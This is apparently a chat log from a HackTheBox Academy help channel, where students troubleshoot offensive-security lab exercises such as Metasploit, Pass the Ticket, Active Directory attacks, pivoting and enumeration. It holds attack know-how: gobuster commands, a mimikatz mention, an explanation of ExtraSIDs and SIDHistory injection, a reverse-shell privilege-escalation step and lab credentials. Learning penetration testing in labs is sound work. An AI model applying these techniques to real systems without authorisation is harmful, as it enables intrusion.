I'm pretty sure i did, but will check again maybe i missed smth
Thanks
Did not find anything in GPO Attacks.
Get-DomainGPO fails because it calls Get-Forest which fails too since the domain is not linked to a forest (at least that's what the error says).
You can try running them from the initial machine for example
Oh, found it lol.
Why did the commands fail though?
dm please
Hi everyone, I need some help with the 'Using the Metasploit Framework' module, Section 11.
I'm trying to use the exploit/windows/iis/iis_webdav_upload_asp as instructed, but the target's Port 80 is persistently CLOSED.
Steps I've taken:
Connected via VPN (tun0 is up).
Reset the machine multiple times.
Terminated and spawned a fresh new instance.
Waited 5+ minutes for services to boot.
Current Status: nmap -Pn <Target_IP> shows ports 135, 445, 3389, and 5985 are OPEN, but Port 80 is CLOSED.
Since the exploit requires WebDAV on port 80, I cannot proceed. Is this a known issue with the instance spawning, or is there a trick to wake up the IIS service on this box? Thanks!
Math, difference refers to subtraction a - b, typically larger number minus smaller number
Section 11? What's the name of it? And are you sure its not meant to be a different exploit?
The module is 'Using the Metasploit Framework'. Section 11 is named 'Meterpreter'.
The instructional text explicitly uses the exploit/windows/iis/iis_webdav_upload_asp targeting IIS 6.0. However, the spawned instance has Port 80 CLOSED and ports 445/5985 OPEN, which looks like a more modern Windows potentially vulnerable to EternalBlue, but I am trying to follow the guide
Hello! i am having a problem in module password attacks Pass the Ticket (PtT) from Linux
i am on this specific question: Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \\DC01\julio.
i am trying to import the ccache in the current session but for some reason when i run klist the ticket is not imported.
Did you export the file to the KRB5CCACHE env variable?
yes!
but for now i have another problem ! i try to do sudo su from svc_workstations but i get this "unable to resolve host linux01.inlanefreight.htb: Temporary failure in name resolution"
probably the system lagged in this one . now its ok
i copied it and exported it and ran klist but still nothing
I did the cookie fuzzing exercise in the "ZAP Fuzzer" section of "Using Web Proxies". I tried a ridiculous number of attempts using ZAP but nothing worked. Given that the logic of the question is fairly easy to follow, the implication of the hashing of the usernames in the word list is simply ||that substituting one of these as a cookie in the relevant location will render the flag||.
In the end I just ||stuffed the cookie in chromium developer tools and got the flag that way||. So much for Zap proficiency.... Despite understanding the question and having "proof of concept " -as it were- I couldn't get ZAP to give up the goods.
Can someone explain where this ccache file came from? I'm so confused. It's not on the list
Pass the Ticket (Linux) (Password attacks)
i had the same question! i think is for demonstration of the example! you have to use the valid one from the ones that you found !
Yes I know, thanks.
There's still some issues in the module write-up regarding that.
Hey guys, any1 having problems with spawning machines? Is it related to cloudflare issue?
Yeah. I think its still happening.
Same here. Machine died and now I can't spawn
welp
F
I cant spawn machines too
I am still having the same issue with "Windows Attacks and Defense" module for the "Kerberoasting" section, where I can spawn the box but I receive SPNEGO received NTSTATUS: STATUS_TRUSTED_RELATIONSHIP_FAILURE [0xC000018D] from server when attempting to RDP in using the provided credentials.
I was told to wait 10 to 15 minutes for the trust relationships to build, assuming between WS001 and the DC, but even after 30+ minutes I'm still failing to connect.
Can anyone assist?
My instance is not starting....from 15 minutes ....it is loading
same cant spawn the target
anyone else facing the same problem?
I think this is a global issue
I thought cloudflare services are up now
just got it spawned.
windows target?
sorry, pwnbox just spawned.
yeah pwnbox working fine
Oh, I had issues before.
hi so for the Windows Event Logs section of Windows Event Logs and Finding Evil module, question 1, I identified the right log but the executable mentioned in the log doesn't match up with the format the question mentions
can someone help me out here?
I know the right log and have it narrowed down to the log at the time and event ID mentioned
nevermind solved
Hey guys, could anyone please give me a nudge to figure out how I should proceed for the Penetration Tester job path, on the Web Enumeration module? I've managed to find an admin login page from the robots.txt file, and found the credentials from the source of the page.
I managed to login, but then it's just a blank page with a logout button and the string below.
I tried inputting that into the challenge on HTB but it says it's wrong and I'm a bit lost.
What I've done so far is:
$ gobuster dir -u http://83.136.255.235:56721/ -w /usr/share/seclists/Discovery/Web-Content/common.txt
(this one gave me several routes, most of which are 403, but there's a wordpress one which is 301. I haven't been taught how to exploit wordpress yet so I'm not sure if this is the right path to go down on)
$ gobuster dns -d 83.136.255.235 -w /usr/share/seclists/Discovery/DNS/namelist.txt
(this one doesn't give any dns results at all)
Running whatweb on the IP without the port gives me a few 200 results, but I think they're legit pages I guess.
I've also curled the target, but that only tells me that it's running apache.
What am I missing here?
Hey guys, please can anyone assist with this? working on pivoting skills assessment lab and I am trying to run ligolo agent on the target host but keep getting this. The host is amd64 arch and the agent is for amd64 arch. How do i fix this error?
@turbid inlet
- It helps to know what section you're working on
- Are you sure that the string you found isn't the flag?
i take it you downloaded the zipped pre-compiled agent and proxy?
- I'm on the Web Enumeration Section. Sorry, in my previous message I said I was on the Web Enumeration module. In fact it's the Getting Started module, Web Enumeration section.
- I've input the string I found and it tells me it's wrong, so I assume I need to use it somehow to find the actual flag, unless it's a red herring
ah sec
Do sections build on each other by the way? So would I need to use knowledge from the previous section (Service Scanning) to solve this one?
you have the flag; HTB{..}
also don't share flags
Ok sorry, I thought it was enough to put it as a spoiler. Won't do again. However why does it tell me it's wrong when I put it in the question at the end of the section?
make sure you didn't copy any additional whitespace characters
but looking at the answer and what I deleted; it should be correct
yeap that was it! I must have copied whitespace. I've been banging my head around this for the past hour lol. thanks!
but yeah, don't share flags -- even in spoiler tags. It's a quick way to get beaned, and (at least assuming your pfp is Reggie) your body is not ready for that
hahahaha noted! and yes its reggie xD that gave me a good chuckle
solved it, wget output file was incorrect.
Hi! I have a question about the “Using CrackMapExec” skill assessment. I’m stuck on question 4: ||I’ve found a KeePass file on the “dev01” machine, but I can’t crack the password even after trying all the passwords I found for the users. Nothing works.
According to the instructions, I’m supposed to find passwords that should let me access a shared folder with “ccache” files. Is that correct, or am I going down the wrong path?||
Do you have any hint or advice to help me move forward at this step? Thanks in advance!
did you use keepass_trigger module?
Yes, I finally found the password using this module, but when I entered it into the KDBX file, I received an error message. I tried to download the file again but I still have this error
If this reoccurs, then your database file may be corrupt.
I tried via winrm and the option --get-file of netexec
I got it it wasn't the password of the keepass but of one user !
I am genuinely so confused. I don't know if I'm being slow or if the code provided from the skill assessment is wrong. I am doing the Intro to bash scripting module, flow control - Loops. I have tried probably 6 different types of loops and I get nothing. Then I noticed that the hash (variable named hash) is supposed to be altered by sed (command) but the input that is supposed to get changed by sed doesn't exist in "hash". idk, can someone help point me in the right direction? This is the latest loop I used. for i in {1..28}
do
var=$(printf '%s' "$var" | base64 | tr -d '\n')
done
salt=${#var}
the module isn't expecting you to remove new-lines or use ${#var} convention
When I tried the regular.
for i in {1..28}
do
salt=$( echo $var | base64 )
done
salt=$( echo $salt | wc -c )
I still get it wrong, so I'm confused 😅
hey did you find the answer?
.
hey can someone please help me in Android Application Static Analysis > Skills Assessment
|| I use Hermes-Dec, but I don't know how to find the hidden post. I searched for everything in JS code and found nothing. ||
you're adding an unnecessary step
can anyone explain to me the difference between extraSIDs attack and SIDHistory Injection. I have read multiple articles and I still can't wrap my head around it
I have doubts on some techniques discussed in the CPTS course module. Right now I'm on "Attacking Active Directory". Although it was explained in the module that a pentester should always ask permission properly from the client for any modification of registries, adding users, password resets, etc.
I know it's taboo to discuss the exam content. But I just want to ask if techniques like password reset and adding users for your own good to move laterally or vertically are even allowed?
solved, || search for news ||
Can you help me on this?
Correct me if I'm wrong but the way that I see these two attacks is the ExtraSIDS attack basically says to kerberos that they are a current member of a high privileged group and lies about user permissions. The SID history attack means that if a user WAS part of a high privileged group in another domain using SID history means that they should still have that privilege in place. Thoughts?
idk I'm not a pentester but I would say that you should never do it unless it is explicitly authorised in scope but yeh idk
ExtraSIDs attack = You forge a Kerberos ticket and add privileged SIDs directly into the ticket, making Kerberos believe you are currently in those groups.
SIDHistory injection = You modify the user’s SIDHistory attribute in Active Directory to include privileged SIDs, making AD believe you previously belonged to those groups.
I hope someone can advise.
Yes I was thinking exactly this, but the way to abuse SIDHistory Injection is still to forge a golden ticket at the end after including, let's say, the Enterprise Admins group's SID. Am I wrong?
SIDHistory Injection is done by modifying the user object in AD. Once SIDHistory is modified, Kerberos naturally includes that SID in all future tickets for that user.
footprint hard, any hints? stuck at the very beginning
Ahh okay I understand it now. Much thanks
UDP? Might be your friend in this one
did that ||snmp|| is there.. tried bruteforcing the string using onesixtyone, didn't get anything
snmpwalk gives a timeout error if I give v2c.. if I give v3 it says No securityName specified
Have you used more than 1 wordlist?
snmp.txt and common-snmp-community-strings.txt
Can you dm me the onesixtyone you used?
oh I didn't read the output correctly
I am so sorry, I need some sleep ahh
btw nmap showed this is SNMP version 3, so how is it using community strings?
Don't worry
Mintyfresh This explains it a bit
well in that case it was just a fluke that I tried bruteforcing it
Sums up how it goes every time for me
Hello! I have a question on the password attacks module, on the pass the certificate section. It says to ensure that krb5.conf is properly configured. Is the configuration different from the last section? If yes, any hints? Because I tried putting .local in the default realm and realms but no luck so far
you might be able to use netexec --generate-krb5-file which is in the new version, makes it much easier
how to get rid of these cert errors while interacting with the imap/pop3 server over ssl using openssl - footprint hard
in prev footprint medium i got cert errors with xfreerdp which I bypassed using /cert-ignore
thanks i will try it!
Attacking Common Services - Skills Assessment - Easy
Need a hint where to find a password. I found a username from ||smtp||.
Hi everyone, I’m not sure if this is the right place to ask, but I’d really appreciate some guidance. I’m trying to understand how you guys develop your own methodology when approaching a new box.
I’ve noticed that I can complete modules and take notes on the tools used (commands, syntax, screenshots, etc.), but when I face a brand-new box, I often get stuck on how to apply those concepts in practice.
For example, when I encounter a business logic challenge, I quickly run out of ideas on what approach to try next. I understand that modules are meant to teach concepts; not spoon-feed solutions; but I still struggle to convert what I learned into a flexible, adaptive methodology.
So my questions are:
- How do you personally craft your methodology when facing a new target?
- Like.. what does your thought process look like before touching any tool?
- How do you structure your notes?
- Do you write things like “If you encounter X challenge, try approach (1), (2), (3)”? – Or do you organize your notes in some other way to help generate ideas when stuck?
your methodology shouldn't generally change; in terms of most things -- Methodology is just how you tackle a problem, not necessarily the TTPs used to get past a hurdle
Methodology is a rough thought process you follow
Methods are how you actually tackle a specific problem
I finished the Footprinting module, I wonder if there are any good labs that have the same ideas to practice what I learned in that module?
all labs have footprinting to a degree
Ok. but is there a particular lab that focuses more on the stuff learned in that module?
no; because footprinting for me comes at step 0 of the process - Enumeration
boxes will go beyond step 0, consistently, so just having footprinting skills isn't going to be enough to pwn a box
ok… do you think i should continue the path or should i practice with some boxes first?
continue the path
footprinting is just the surface; everything in that module is an assumption that there's no barriers to getting access, like no passwords/anon login
oh💀
"to test the flashlight, just press the button to turn it on" - footprinting
"If it doesn't turn on you'll need to unscrew the bottom and check the batteries" - exploiting
(Unscrewing doesn't necessarily mean you need to know how a protocol works 100%, just knowing what to look for)
I am currently on the pass the certificate section of password attacks. I am stuck on how to begin with the second question to find the admin flag. Any hints?
read the module... it kinda details how to get the admin stuff
indeed, my apologies
I have doubts on some techniques discussed in the CPTS course module. Right now I'm on "Attacking Active Directory". It was explained in the module that a pentester should always ask permission properly from the client for any modification of registries, adding users, password resets, etc.
I know it's taboo to discuss the exam content. But I just want to ask if techniques like password resets and creating users for your own good to move laterally or vertically are even allowed in the exam?
the exam gives you a proper Scope to work within
Hello guys, has anyone done all the Wi-Fi modules and has good structured notes? I would like to see how you structured your notes
Kinda stuck here for a while. What's going on?
Same here, can't spawn any target and if it spawns, I can't rdp on it 🙁
:3
Thanks, my doubts are clarified then.
Ditto.
Seems like all labs are down.
Could someone give me a little hint for SQL Injection Fundamental skill assessment after first bypass ? I found injectable parameter but I'm a bit stuck on how to exploit it 🙂
of course
dm me
Can someone help me with the 'File Upload Module' at Type Filter?
I'll offer what I can, but don't wanna give any spoilers
Attacking Common Services - Skills Assessment
When I try to password spray FTP with Hydra, I get the following error:
[ERROR] all children were disabled due too many connection errors
Which one?
Regardless I don’t think any of the three you would have to do that.
I have a question about the academy
Does doing a module give me cubes from doing the questions inside it and give me back the cubes I paid after finishing it? Or is the total number the number it says before buying?
like if a module for example give +10 cubes and inside the questions some of them give +1 is that +1 different from the +10 or is it a part of it
I'm doing Pass The Certificates from Password attacks. I'm just following what is on the module but on this part. Nothing happens
anyone experiencing connection refused on ligolo-ng when pivoting an attack from an msfconsole meterpreter payload (windows)? I tried a normal shell/reverse_tcp and it was coming through using an nc listener. But if I use multi/handler I am seeing connection refused in ligolo-ng
~~Hey again guys, I need some help with the section "Nibbles - Privilege Escalation" in the Getting Started module. I got to the point where I append the reverse shell line at the end of the script I unzipped (correct me if I'm wrong, but the IP I should put in that line for nc to connect to is my IP, while connected with VPN, right?). I make it executable, start the listener with the correct port on my host machine, and then execute the script. I get the following errors from the script and the connection is never made, so I don't get the reverse shell. Anyone got any words of wisdom?
sudo /home/nibbler/personal/stuff/monitor.sh
'unknown': I need something more specific.
/home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
I think it doesn't like this line in the script for some reason, but since the script is provided by htb on the target already idk if it really is the problem:
if [[ ! -z $iopt ]]
Thanks~~
Edit: I restarted the VM and went through the steps again and it was fixed. Idk, maybe there was something I did wrong and a restart fixed it 🤷
If it's allowed, I can of course give the last line of the script which should be the one to give me the reverse shell
Hi everyone, I wanted to ask a question regarding the Skills Assessment for the 'HTTP Attacks' module. I've already found the TE.TE vulnerability and I'm trying to perform CRLF injection of SMTP headers, but I'm not getting the admin email to arrive. Could someone please give me a hint?
set-executionpolicy bypass -Scope Process
that module is above tier 3 please refrain from sharing images/spoilers
Hello, I am on "AD Enumeration & Attacks - Skills Assessment Part II" on question 8. I have run mimikatz on the SQL server but for some reason the output did not show the plain text password (but did show the account. The password field simply said "null"). I resorted to crackmapexec, which did output the accounts but not sure how I am supposed to decode the hex output.
Responder (Very Easy Machine) from starting point 1
Hey there, I have problem with the site that I'm being redirected to. It sends me to unika.htb but seems like it's not working and I'm kinda lost. Error says on the web "Hmm. We’re having trouble finding that site."
Should it work? Or should I continue with the given IP address? But idk how, if it redirects me to the non-working site
below where
Check how the /etc/hosts file works and how useful it is to 'override' DNS. Because unika.htb is not exposed to the internet, your OS doesn't know what domain it is, so you have to manually add the IP and the domain in the /etc/hosts file
<ip> unika.htb
Now your OS will first look at this file and will see the IP address. It now knows how to connect to this IP, which is hosted on the HackTheBox network where the web server runs.
Hi, good afternoon. I'm doing the competency assessment for the "Hacking WordPress" module and I'm stuck because, from what I understand, when mapping with nmap, the server is hosted on Apache, and I've never dealt with this before and have no idea how to analyze the services. Do I have to find the vhost and analyze the vhost's services, or not? If so, how do I find out which vhost it is? I know I'm probably asking something really silly, but I'm completely lost. Thank you in advance for your help.
Got it, thanks!
Hello all. I'm on the web fuzzing: validating findings for the CWEs. In the question section, it asks me to find a directory and a tar.gz file. I have the directory but there is no tar.gz file. Only a txt file that contains a password and a sql backup. What am I missing?
no problem
so frustrating to see how slow and uncreative I am for that kind of problem
Not everyone has enterprise
I'm sure I'm missing something but no idea what
arf
I can still show you with some screen shot I guess
If it's ok for you guys
Yeah that's why I asked
but it would be amazing yes
Also your enterprise link only works for others within your org
good to know
Recursion, and -e options. Not sure what you tried but im not able to sanity check fully atm
Also with curl, -I
basically the question asks to fuzz a URL to get a directory and check for a tar.gz file in it. No trace of such a file in the only directory I found
As it's asking for content-length, which is in the header
I'm going to try it right now
Recursion is important
it is
ooooooooh I see
Followup thought to my question, when I run 'sudo crackmapexec smb <SNIP> -lsa', it outputs the hashes. It mentions "The hex string can be decoded to reveal the password <password>". I thought all the crackmapexec output was hashes, not encoding? How do I know what to decode?
The hash is encoded when it's passed through
It just all depends, but it's giving the intended output; it should tell you though that it's encoded
found it. Thanks for the tip 💪
Did you get this working?
Hi! In the "Incident Handling Process" module, Skills Assessment's first tasks, I'm having trouble connecting to the target from the Pwnbox. I try xfreerdp /v:10.129.119.61 /u:htb-analyst /p:P3n#31337@LOG and I get
[06:50:35:669] [34679:34680] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[06:50:35:670] [34679:34680] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[06:50:35:723] [34679:34680] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[06:50:35:723] [34679:34680] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[06:50:35:723] [34679:34680] [ERROR][com.freerdp.core] - freerdp_post_connect failed
Need hints for fixing it
are you meant to rdp?
Just checked, nope
I don't think I follow you, I'm not running anything on PowerShell. The ligolo-ng server and agent both run on Linux
ah thought it was a windows issue
since yknow, you mentioned a windows payload
if you're trying to get a callback to your attack host remember, the payload has to follow a chain
A <-> B <-> C
A --B--> C
C !----> A
hopefully the diagram is helpful
thank you from 5 months ago this was driving me insane
that's not an error; body[] is the more appropriate fetch protocol, all grabs metadata about the email
Hello, I'm currently doing Skill assessment on password attack. Is it okay to make a write up? (with censoring passwords,hashes, flags ofc)
nope
when i try to fetch email in case of pop3s I get this
That's an issue with ssl, sudo apt install openssl --reinstall --fix-broken
didnt work
@jovial walrus the module is above tier 0, please don't spoil things. But to answer: not all running services are available externally
sry about that, how am I supposed to ask queries then?
You can ask without spoilers or ask for a nudge in dms, like
"Hey I have a foothold on this and found a service, can someone help?"
ah ok
and we don't have any official forums for these tiers?
I had done it over imaps and got no errors, didn't check pop3s
it's some openssl bug with pop3s but I found an alternate way to use openssl with pop3s
no; there's no official forum, as that would conflict heavily with the writeup/guides ToS, and wouldn't make sense to have anyway if we actively discourage spoilers. We treat tier 1+ spoilers like we would spoilers for active machines
Hi. May I dm you? I need to ask something about a particular method in a skills assessment question. Please note I have already completed it using another method. Thanks.
dm please
how deliciously vague
you'll understand when I'll share it with you